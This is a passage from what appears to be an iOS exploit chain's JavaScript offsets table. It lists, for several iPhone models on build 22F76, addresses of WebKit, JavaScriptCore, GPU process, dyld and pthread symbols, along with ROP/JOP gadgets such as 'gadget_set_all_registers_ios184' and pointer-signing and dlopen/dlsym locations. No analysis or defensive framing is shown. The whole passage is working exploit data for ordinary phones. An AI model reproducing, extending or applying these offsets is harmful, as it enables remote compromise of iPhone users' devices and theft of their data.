ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9bdc78n, 480 ImageIO__gImageIOLogProc: 0x1ee9bc960n, 481 JavaScriptCore__globalFuncParseFloat: 0x19a8715ecn, 482 JavaScriptCore__jitAllowList: 0x1edb3e4a0n, 483 JavaScriptCore__jitAllowList_once: 0x1edb3e2b8n, 484 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac39744n, 485 PerfPowerServicesReader_cstring: 0x257b97e60n, 486 RemoteGraphicsContextGLWorkQueue: 0x1eda5e218n, 487 RemoteRenderingBackendProxy_off: 0x830n, 488 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5d7688n, 489 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5eb958n, 490 Security__gSecurityd: 0x1eb67fd78n, 491 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd8d288n, 492 UI_m_connection: 0x28n, 493 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f137cf70n, 494 WebCore__PAL_getPKContactClass: 0x1eda62478n, 495 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb91eed0n, 496 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8d9ac8n, 497 WebCore__initPKContact_once: 0x1eda6afb8n, 498 WebCore__initPKContact_value: 0x1eda6afc0n, 499 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda69780n, 500 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda69778n, 501 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda69760n, 502 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb48548n, 503 WebProcess_ensureGPUProcessConnection: 0x199195958n, 504 WebProcess_gpuProcessConnectionClosed: 0x199ae82fcn, 505 WebProcess_singleton: 0x1eda5f3c0n, 506 __pthread_head: 0x26903c020n, 507 dyld__RuntimeState_emptySlot: 0x1a9a75b6cn, 508 dyld__RuntimeState_vtable: 0x1f2871aa0n, 509 dyld__dlopen_from_lambda_ret: 0x1a9a33fc8n, 510 dyld__signPointer: 0x1a9a3f3e4n, 511 emptyString: 0x1edb14420n, 512 free_slabs: 0x1ed9a4d90n, 513 gadget_control_1_ios184: 0x23f1d42ecn, 514 gadget_control_2_ios184: 0x1ad86ac28n, 515 gadget_control_3_ios184: 0x21f24a150n, 516 gadget_loop_1_ios184: 0x1865f818cn, 517 gadget_loop_2_ios184: 0x20d231da8n, 518 gadget_loop_3_ios184: 0x184d29f1cn, 519 gadget_set_all_registers_ios184: 0x20dfaa16cn, 520 jsc_base: 0x19a45a000n, 521 libARI_cstring: 0x218abb820n, 522 libGPUCompilerImplLazy__invoker: 0x23cf797e8n, 523 libGPUCompilerImplLazy_cstring: 0x23c0c3870n, 524 libdyld__dlopen: 0x1ad86c7b8n, 525 libdyld__dlsym: 0x1ad86da34n, 526 libdyld__gAPIs: 0x1ed5b8000n, 527 libsystem_c__atexit_mutex: 0x1ed8ca258n, 528 libsystem_kernel__thread_suspend: 0x1d3da51c0n, 529 libsystem_pthread_base: 0x20d280000n, 530 m_backend: 0x70n, 531 m_drawingArea: 0x50n, 532 m_gpuProcessConnection: 0x158n, 533 m_gpuProcessConnection_m_identifier: 0x38n, 534 m_imageBuffer: 0x18n, 535 m_isRenderingSuspended: 0xe8n, 536 m_platformContext: 0x38n, 537 m_remoteDisplayLists: 0x70n, 538 m_remoteRenderingBackendMap: 0xe8n, 539 m_webProcessConnections: 0x80n, 540 mach_task_self_ptr: 0x1ed8c94c0n, 541 mainRunLoop: 0x1edb2c020n, 542 privateState_off: 0x7e8n, 543 pthread_create_jsc: 0x19bd26f30n, 544 pthread_create_offset: 0x6988n, 545 runLoopHolder_tid: 0x1edb3c708n, 546 rxBufferMtl_off: 0x100n, 547 rxMtlBuffer_off: 0x70n, 548 vertexAttribVector_off: 0x2548n 549 }, 550 "iPhone13,1_22F76": { 551 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edadf0d8n, 552 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edadebc0n, 553 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edadeb20n, 554 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edadeb70n, 555 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edaddf68n, 556 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195b658n, 557 AXCoreUtilities__DefaultLoader: 0x1eb7bcbe0n, 558 CAPointer: 0x20n, 559 CFNetwork__gConstantCFStringValueTable: 0x1ee9326e0n, 560 CGContextDelegate: 0x28n, 561 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ea428n, 562 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ea580n, 563 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3b9cb8n, 564 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3ba1e4n, 565 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3ba748n, 566 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3ba304n, 567 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80ad898n, 568 DesktopServicesPriv_bss: 0x1ecca3a08n, 569 Foundation__NSBundleTables_bundleTables_value: 0x1ed8ebc88n, 570 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 571 GPUProcess_singleton: 0x1eb924a98n, 572 GetCurrentThreadTLSIndex_CurrentThreadIndex: 0x1ee7f3bc0n, 573 HOMEUI_cstring: 0x182f75636n, 574 IOSurfaceContextDelegate: 0x120n, 575 IOSurfaceDrawable: 0x150n, 576 IOSurfaceQueue: 0x48n, 577 ImageIO__IIOLoadCMPhotoSymbols: 0x18865182cn, 578 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9be5f0n, 579 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9be2a0n, 580 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9be2a8n, 581 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9be2b0n, 582 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9be1f0n, 583 ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9be2b8n, 584 ImageIO__gImageIOLogProc: 0x1ee9bc960n, 585 JavaScriptCore__globalFuncParseFloat: 0x19a8715ecn, 586 JavaScriptCore__jitAllowList: 0x1edb3e4a0n, 587 JavaScriptCore__jitAllowList_once: 0x1edb3e2b8n, 588 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac39744n, 589 PerfPowerServicesReader_cstring: 0x257e7fe60n, 590 RemoteGraphicsContextGLWorkQueue: 0x1eda5e858n, 591 RemoteRenderingBackendProxy_off: 0x830n, 592 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5d7688n, 593 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5eb958n, 594 Security__gSecurityd: 0x1eb67fd78n, 595 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd8d288n, 596 UI_m_connection: 0x28n, 597 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f137cf70n, 598 WebCore__PAL_getPKContactClass: 0x1eda62ab8n, 599 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb91eed0n, 600 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8d9ac8n, 601 WebCore__initPKContact_once: 0x1eda6b5f8n, 602 WebCore__initPKContact_value: 0x1eda6b600n, 603 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda69dc0n, 604 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda69db8n, 605 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda69da0n, 606 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb48548n, 607 WebProcess_ensureGPUProcessConnection: 0x199195958n, 608 WebProcess_gpuProcessConnectionClosed: 0x199ae82fcn, 609 WebProcess_singleton: 0x1eda5fa00n, 610 __pthread_head: 0x269374020n, 611 dyld__RuntimeState_emptySlot: 0x1a9a75b6cn, 612 dyld__RuntimeState_vtable: 0x1f2871aa0n, 613 dyld__dlopen_from_lambda_ret: 0x1a9a33fc8n, 614 dyld__signPointer: 0x1a9a3f3e4n, 615 emptyString: 0x1edb14420n, 616 free_slabs: 0x1ed9a53d0n, 617 gadget_control_1_ios184: 0x23f0fe2ecn, 618 gadget_control_2_ios184: 0x1ad86ac28n, 619 gadget_control_3_ios184: 0x21f26d150n, 620 gadget_loop_1_ios184: 0x1865f818cn, 621 gadget_loop_2_ios184: 0x20d241da8n, 622 gadget_loop_3_ios184: 0x184d29f1cn, 623 gadget_set_all_registers_ios184: 0x20dfba16cn, 624 jsc_base: 0x19a45a000n, 625 libARI_cstring: 0x218acb820n, 626 libGPUCompilerImplLazy__invoker: 0x23cea37e8n, 627 libGPUCompilerImplLazy_cstring: 0x23bfed870n, 628 libdyld__dlopen: 0x1ad86c7b8n, 629 libdyld__dlsym: 0x1ad86da34n, 630 libdyld__gAPIs: 0x1ed5b8000n, 631 libsystem_c__atexit_mutex: 0x1ed8ca898n, 632 libsystem_kernel__thread_suspend: 0x1d3da51c0n, 633 libsystem_pthread_base: 0x20d290000n, 634 m_backend: 0x70n, 635 m_drawingArea: 0x50n, 636 m_gpuProcessConnection: 0x158n, 637 m_gpuProcessConnection_m_identifier: 0x38n, 638 m_imageBuffer: 0x18n, 639 m_isRenderingSuspended: 0xe8n, 640 m_platformContext: 0x38n, 641 m_remoteDisplayLists: 0x70n, 642 m_remoteRenderingBackendMap: 0xe8n, 643 m_webProcessConnections: 0x80n, 644 mach_task_self_ptr: 0x1ed8c9b00n, 645 mainRunLoop: 0x1edb2c020n, 646 privateState_off: 0x7e8n, 647 pthread_create_jsc: 0x19bd26f30n, 648 pthread_create_offset: 0x6988n, 649 runLoopHolder_tid: 0x1edb3c708n, 650 rxBufferMtl_off: 0x100n, 651 rxMtlBuffer_off: 0x70n, 652 vertexAttribVector_off: 0x2548n 653 }, 654 "iPhone13,2_3_22F76": { 655 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edadf1d8n, 656 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edadecc0n, 657 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edadec20n, 658 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edadec70n, 659 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edade068n, 660 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195b658n, 661 AXCoreUtilities__DefaultLoader: 0x1eb7bcbe0n, 662 CAPointer: 0x20n, 663 CFNetwork__gConstantCFStringValueTable: 0x1ee9326e0n, 664 CGContextDelegate: 0x28n, 665 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ea428n, 666 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ea580n, 667 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3b9cb8n, 668 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3ba1e4n, 669 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3ba748n, 670 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3ba304n, 671 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80ad898n, 672 DesktopServicesPriv_bss: 0x1ecca3a08n, 673 Foundation__NSBundleTables_bundleTables_value: 0x1ed8ebd88n, 674 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 675 GPUProcess_singleton: 0x1eb924a98n, 676 GetCurrentThreadTLSIndex_CurrentThreadIndex: 0x1ee7f3bc0n, 677 HOMEUI_cstring: 0x182f75636n, 678 IOSurfaceContextDelegate: 0x120n, 679 IOSurfaceDrawable: 0x150n, 680 IOSurfaceQueue: 0x48n, 681 ImageIO__IIOLoadCMPhotoSymbols: 0x18865182cn, 682 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9be6f0n, 683 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9be3a0n, 684 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9be3a8n, 685 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9be3b0n, 686 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9be2f0n, 687 ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9be3b8n, 688 ImageIO__gImageIOLogProc: 0x1ee9bc960n, 689 JavaScriptCore__globalFuncParseFloat: 0x19a8715ecn, 690 JavaScriptCore__jitAllowList: 0x1edb3e4a0n, 691 JavaScriptCore__jitAllowList_once: 0x1edb3e2b8n, 692 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac39744n, 693 PerfPowerServicesReader_cstring: 0x257fdfe60n, 694 RemoteGraphicsContextGLWorkQueue: 0x1eda5e958n, 695 RemoteRenderingBackendProxy_off: 0x830n, 696 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5d7688n, 697 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5eb958n, 698 Security__gSecurityd: 0x1eb67fd78n, 699 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd8d288n, 700 UI_m_connection: 0x28n, 701 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f137cf70n, 702 WebCore__PAL_getPKContactClass: 0x1eda62bb8n, 703 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb91eed0n, 704 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8d9ac8n, 705 WebCore__initPKContact_once: 0x1eda6b6f8n, 706 WebCore__initPKContact_value: 0x1eda6b700n, 707 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda69ec0n, 708 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda69eb8n, 709 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda69ea0n, 710 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb48548n, 711 WebProcess_ensureGPUProcessConnection: 0x199195958n, 712 WebProcess_gpuProcessConnectionClosed: 0x199ae82fcn, 713 WebProcess_singleton: 0x1eda5fb00n, 714 __pthread_head: 0x269d8c020n, 715 dyld__RuntimeState_emptySlot: 0x1a9a75b6cn, 716 dyld__RuntimeState_vtable: 0x1f2871aa0n, 717 dyld__dlopen_from_lambda_ret: 0x1a9a33fc8n, 718 dyld__signPointer: 0x1a9a3f3e4n, 719 emptyString: 0x1edb14420n, 720 free_slabs: 0x1ed9a54d0n, 721 gadget_control_1_ios184: 0x23f1022ecn, 722 gadget_control_2_ios184: 0x1ad86ac28n, 723 gadget_control_3_ios184: 0x21f271150n, 724 gadget_loop_1_ios184: 0x1865f818cn, 725 gadget_loop_2_ios184: 0x20d245da8n, 726 gadget_loop_3_ios184: 0x184d29f1cn, 727 gadget_set_all_registers_ios184: 0x20dfbe16cn, 728 jsc_base: 0x19a45a000n, 729 libARI_cstring: 0x218acf820n, 730 libGPUCompilerImplLazy__invoker: 0x23cea77e8n, 731 libGPUCompilerImplLazy_cstring: 0x23bff1870n, 732 libdyld__dlopen: 0x1ad86c7b8n, 733 libdyld__dlsym: 0x1ad86da34n, 734 libdyld__gAPIs: 0x1ed5b8000n, 735 libsystem_c__atexit_mutex: 0x1ed8ca998n, 736 libsystem_kernel__thread_suspend: 0x1d3da51c0n, 737 libsystem_pthread_base: 0x20d294000n, 738 m_backend: 0x70n, 739 m_drawingArea: 0x50n, 740 m_gpuProcessConnection: 0x158n, 741 m_gpuProcessConnection_m_identifier: 0x38n, 742 m_imageBuffer: 0x18n, 743 m_isRenderingSuspended: 0xe8n, 744 m_platformContext: 0x38n, 745 m_remoteDisplayLists: 0x70n, 746 m_remoteRenderingBackendMap: 0xe8n, 747 m_webProcessConnections: 0x80n, 748 mach_task_self_ptr: 0x1ed8c9c00n, 749 mainRunLoop: 0x1edb2c020n, 750 privateState_off: 0x7e8n, 751 pthread_create_jsc: 0x19bd26f30n, 752 pthread_create_offset: 0x6988n, 753 runLoopHolder_tid: 0x1edb3c708n, 754 rxBufferMtl_off: 0x100n, 755 rxMtlBuffer_off: 0x70n, 756 vertexAttribVector_off: 0x2548n 757 }, 758 "iPhone13,4_22F76": { 759 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edadf1d8n, 760 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edadecc0n, 761 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edadec20n, 762 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edadec70n, 763 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edade068n, 764 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195b658n, 765 AXCoreUtilities__DefaultLoader: 0x1eb7bcbe0n, 766 CAPointer: 0x20n, 767 CFNetwork__gConstantCFStringValueTable: 0x1ee9326e0n, 768 CGContextDelegate: 0x28n, 769 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ea428n, 770 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ea580n, 771 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3b9cb8n, 772 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3ba1e4n, 773 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3ba748n, 774 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3ba304n, 775 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80ad898n, 776 DesktopServicesPriv_bss: 0x1ecca3a08n, 777 Foundation__NSBundleTables_bundleTables_value: 0x1ed8ebd88n, 778 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 779 GPUProcess_singleton: 0x1eb924a98n, 780 GetCurrentThreadTLSIndex_CurrentThreadIndex: 0x1ee7f3bc0n, 781 HOMEUI_cstring: 0x182f75636n, 782 IOSurfaceContextDelegate: 0x120n, 783 IOSurfaceDrawable: 0x150n, 784 IOSurfaceQueue: 0x48n, 785 ImageIO__IIOLoadCMPhotoSymbols: 0x18865182cn, 786 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9be6f0n, 787 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9be3a0n, 788 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9be3a8n, 789 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9be3b0n, 790 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9be2f0n, 791 ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9be3b8n, 792 ImageIO__gImageIOLogProc: 0x1ee9bc960n, 793 JavaScriptCore__globalFuncParseFloat: 0x19a8715ecn, 794 JavaScriptCore__jitAllowList: 0x1edb3e4a0n, 795 JavaScriptCore__jitAllowList_once: 0x1edb3e2b8n, 796 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac39744n, 797 PerfPowerServicesReader_cstring: 0x257fdfe60n, 798 RemoteGraphicsContextGLWorkQueue: 0x1eda5e958n, 799 RemoteRenderingBackendProxy_off: 0x830n, 800 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5d7688n, 801 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5eb958n, 802 Security__gSecurityd: 0x1eb67fd78n, 803 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd8d288n, 804 UI_m_connection: 0x28n, 805 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f137cf70n, 806 WebCore__PAL_getPKContactClass: 0x1eda62bb8n, 807 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb91eed0n, 808 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8d9ac8n, 809 WebCore__initPKContact_once: 0x1eda6b6f8n, 810 WebCore__initPKContact_value: 0x1eda6b700n, 811 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda69ec0n, 812 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda69eb8n, 813 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda69ea0n, 814 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb48548n, 815 WebProcess_ensureGPUProcessConnection: 0x199195958n, 816 WebProcess_gpuProcessConnectionClosed: 0x199ae82fcn, 817 WebProcess_singleton: 0x1eda5fb00n, 818 __pthread_head: 0x269d8c020n, 819 dyld__RuntimeState_emptySlot: 0x1a9a75b6cn, 820 dyld__RuntimeState_vtable: 0x1f2871aa0n, 821 dyld__dlopen_from_lambda_ret: 0x1a9a33fc8n, 822 dyld__signPointer: 0x1a9a3f3e4n, 823 emptyString: 0x1edb14420n, 824 free_slabs: 0x1ed9a54d0n, 825 gadget_control_1_ios184: 0x23f1022ecn, 826 gadget_control_2_ios184: 0x1ad86ac28n, 827 gadget_control_3_ios184: 0x21f271150n, 828 gadget_loop_1_ios184: 0x1865f818cn, 829 gadget_loop_2_ios184: 0x20d245da8n, 830 gadget_loop_3_ios184: 0x184d29f1cn, 831 gadget_set_all_registers_ios184: 0x20dfbe16cn, 832 jsc_base: 0x19a45a000n, 833 libARI_cstring: 0x218acf820n, 834 libGPUCompilerImplLazy__invoker: 0x23cea77e8n, 835 libGPUCompilerImplLazy_cstring: 0x23bff1870n, 836 libdyld__dlopen: 0x1ad86c7b8n, 837 libdyld__dlsym: 0x1ad86da34n, 838 libdyld__gAPIs: 0x1ed5b8000n, 839 libsystem_c__atexit_mutex: 0x1ed8ca998n, 840 libsystem_kernel__thread_suspend: 0x1d3da51c0n, 841 libsystem_pthread_base: 0x20d294000n, 842 m_backend: 0x70n, 843 m_drawingArea: 0x50n, 844 m_gpuProcessConnection: 0x158n, 845 m_gpuProcessConnection_m_identifier: 0x38n, 846 m_imageBuffer: 0x18n, 847 m_isRenderingSuspended: 0xe8n, 848 m_platformContext: 0x38n, 849 m_remoteDisplayLists: 0x70n, 850 m_remoteRenderingBackendMap: 0xe8n, 851 m_webProcessConnections: 0x80n, 852 mach_task_self_ptr: 0x1ed8c9c00n, 853 mainRunLoop: 0x1edb2c020n, 854 privateState_off: 0x7e8n, 855 pthread_create_jsc: 0x19bd26f30n, 856 pthread_create_offset: 0x6988n, 857 runLoopHolder_tid: 0x1edb3c708n, 858 rxBufferMtl_off: 0x100n, 859 rxMtlBuffer_off: 0x70n, 860 vertexAttribVector_off: 0x2548n 861 }, 862 "iPhone14,2_22F76": { 863 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edadf3d8n, 864 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edadeec0n, 865 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edadee20n, 866 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edadee70n, 867 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edade268n, 868 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195b658n, 869 AXCoreUtilities__DefaultLoader: 0x1eb7bcbe0n, 870 CAPointer: 0x20n, 871 CFNetwork__gConstantCFStringValueTable: 0x1ee9326e0n, 872 CGContextDelegate: 0x28n, 873 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ea428n, 874 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ea580n, 875 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3b9cb8n, 876 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3ba1e4n, 877 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3ba748n, 878 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3ba304n, 879 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80ad898n, 880 DesktopServicesPriv_bss: 0x1ecca3a08n, 881 Foundation__NSBundleTables_bundleTables_value: 0x1ed8ebf88n, 882 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 883 GPUProcess_singleton: 0x1eb924a98n, 884 GetCurrentThreadTLSIndex_CurrentThreadIndex: 0x1ee7f3bc0n, 885 HOMEUI_cstring: 0x182f75636n, 886 IOSurfaceContextDelegate: 0x120n, 887 IOSurfaceDrawable: 0x150n, 888 IOSurfaceQueue: 0x48n, 889 ImageIO__IIOLoadCMPhotoSymbols: 0x18865182cn, 890 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9be8f0n, 891 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9be5a0n, 892 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9be5a8n, 893 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9be5b0n, 894 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9be4f0n, 895 ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9be5b8n, 896 ImageIO__gImageIOLogProc: 0x1ee9bc960n, 897 JavaScriptCore__globalFuncParseFloat: 0x19a8715ecn, 898 JavaScriptCore__jitAllowList: 0x1edb3e4a0n, 899 JavaScriptCore__jitAllowList_once: 0x1edb3e2b8n, 900 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac39744n, 901 PerfPowerServicesReader_cstring: 0x258023e60n, 902 RemoteGraphicsContextGLWorkQueue: 0x1eda5eb58n, 903 RemoteRenderingBackendProxy_off: 0x830n, 904 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5d7688n, 905 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5eb958n, 906 Security__gSecurityd: 0x1eb67fd78n, 907 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd8d288n, 908 UI_m_connection: 0x28n, 909 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f137cf70n, 910 WebCore__PAL_getPKContactClass: 0x1eda62db8n, 911 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb91eed0n, 912 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8d9ac8n, 913 WebCore__initPKContact_once: 0x1eda6b8f8n, 914 WebCore__initPKContact_value: 0x1eda6b900n, 915 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda6a0c0n, 916 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda6a0b8n, 917 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda6a0a0n, 918 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb48548n, 919 WebProcess_ensureGPUProcessConnection: 0x199195958n, 920 WebProcess_gpuProcessConnectionClosed: 0x199ae82fcn, 921 WebProcess_singleton: 0x1eda5fd00n, 922 __pthread_head: 0x26a158020n, 923 dyld__RuntimeState_emptySlot: 0x1a9a75b6cn, 924 dyld__RuntimeState_vtable: 0x1f2871aa0n, 925 dyld__dlopen_from_lambda_ret: 0x1a9a33fc8n, 926 dyld__signPointer: 0x1a9a3f3e4n, 927 emptyString: 0x1edb14420n, 928 free_slabs: 0x1ed9a56d0n, 929 gadget_control_1_ios184: 0x23f0ce2ecn, 930 gadget_control_2_ios184: 0x1ad86ac28n, 931 gadget_control_3_ios184: 0x21f275150n, 932 gadget_loop_1_ios184: 0x1865f818cn, 933 gadget_loop_2_ios184: 0x20d249da8n, 934 gadget_loop_3_ios184: 0x184d29f1cn, 935 gadget_set_all_registers_ios184: 0x20dfc216cn, 936 jsc_base: 0x19a45a000n, 937 libARI_cstring: 0x218ad3820n, 938 libGPUCompilerImplLazy__invoker: 0x23ce737e8n, 939 libGPUCompilerImplLazy_cstring: 0x23bfbd870n, 940 libdyld__dlopen: 0x1ad86c7b8n, 941 libdyld__dlsym: 0x1ad86da34n, 942 libdyld__gAPIs: 0x1ed5b8000n, 943 libsystem_c__atexit_mutex: 0x1ed8cab98n, 944 libsystem_kernel__thread_suspend: 0x1d3da51c0n, 945 libsystem_pthread_base: 0x20d298000n, 946 m_backend: 0x70n, 947 m_drawingArea: 0x50n, 948 m_gpuProcessConnection: 0x158n, 949 m_gpuProcessConnection_m_identifier: 0x38n, 950 m_imageBuffer: 0x18n, 951 m_isRenderingSuspended: 0xe8n, 952 m_platformContext: 0x38n, 953 m_remoteDisplayLists: 0x70n, 954 m_remoteRenderingBackendMap: 0xe8n, 955 m_webProcessConnections: 0x80n, 956 mach_task_self_ptr: 0x1ed8c9e00n, 957 mainRunLoop: 0x1edb2c020n, 